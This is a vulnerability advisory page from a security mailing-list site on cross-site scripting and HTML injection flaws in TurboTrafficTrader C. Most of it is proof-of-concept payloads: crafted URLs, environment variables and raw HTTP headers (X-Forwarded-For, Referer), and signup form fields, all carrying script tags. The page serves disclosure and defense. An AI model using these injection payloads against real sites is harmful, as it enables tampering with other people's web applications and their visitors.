Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

TurboTrafficTrader C Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

No exploit is required, but Kaloyan Olegov Georgiev has supplied the following proof of concept code and examples:

http://www.example.com/cgi-bin/ttt-out?link=testing%20%3Cscript%3Ealert('from_browser_insert');%3C/script%3E
http://www.example.com/cgi-bin/ttt-out?link=testing%20<script>alert('from_browser_insert');</script>

export REMOTE_ADDR="127.0.0.1<script>alert('ip_inject');</script>"
./ttt-in will load one bad record for IP
export HTTP_X_FORWARDED_FOR="10.0.0.1<script>alert('proxy insertion');</script>"
./ttt-in will load an XXSed proxy record

Raw connection example:
telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.1<script>alert('proxy_insert');</script>
Host: www.example.com

telnet www.example.com 80
Trying www.example.com...
Connected to www.example.com.
Escape character is '^]'.
GET /cgi-bin/ttt-in HTTP/1.1
X-Forwarded-For: 192.168.0.6<script>alert('proxy_insert');</script>
Referer: http://www.referrer.com"<script>alert('referrer_inject');</script>"
Host: www.example.com

When signing up for a new account:
Site name = Name"<script>window.open('http://www.example.com');</script>
Site URL = http://www.example.com"<script>alert('name_inject');</script>
Webmaster e-mail = email@example.com"<script>alert('email_inject');</script>
Webmaster ICQ = 123456"<script>alert('ICQ_inject');</script>







 

Privacy Statement
Copyright 2009, SecurityFocus